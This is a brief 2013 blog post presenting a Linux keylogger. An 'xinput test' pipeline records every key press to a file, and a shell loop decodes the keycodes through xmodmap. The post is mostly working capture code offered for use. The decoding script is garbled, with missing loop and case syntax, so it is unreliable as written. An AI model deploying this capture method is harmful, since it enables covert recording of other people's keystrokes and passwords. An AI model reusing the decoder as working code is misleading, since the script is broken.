Tuesday, October 8, 2013

Keylogger for Linux

Dump the keystrokes according to their keycodes to a file called 'dump':
stdbuf -o0 xinput test 11 | stdbuf -o0 awk '/ press /' | stdbuf -o0 awk -F' ' '{print $3}' >> dump

Here, 11 is the standard AT translated keyboard or something. You can figure this number out from the command xinput --list.

Now decode them according to the xmodmap table:

for line in $(cat dump)
    xpr="$(xmodmap -pke | awk "NR==$line-7" | awk '{ print $4}')"
#    echo $xpr
    case "$xpr" in
            echo -e "\n" >> out2
            echo " " >> out2
            echo -n $xpr >> out2
    echo -n " " >> out2
echo -e "\n" >> out2
cat out2

You might need to edit this file depending upon your xmodmap -pke. For example, the variable assignment NR==$line-7 may need modification since my xmodmap -pke starts from keycode 8and follows the natural order throughout.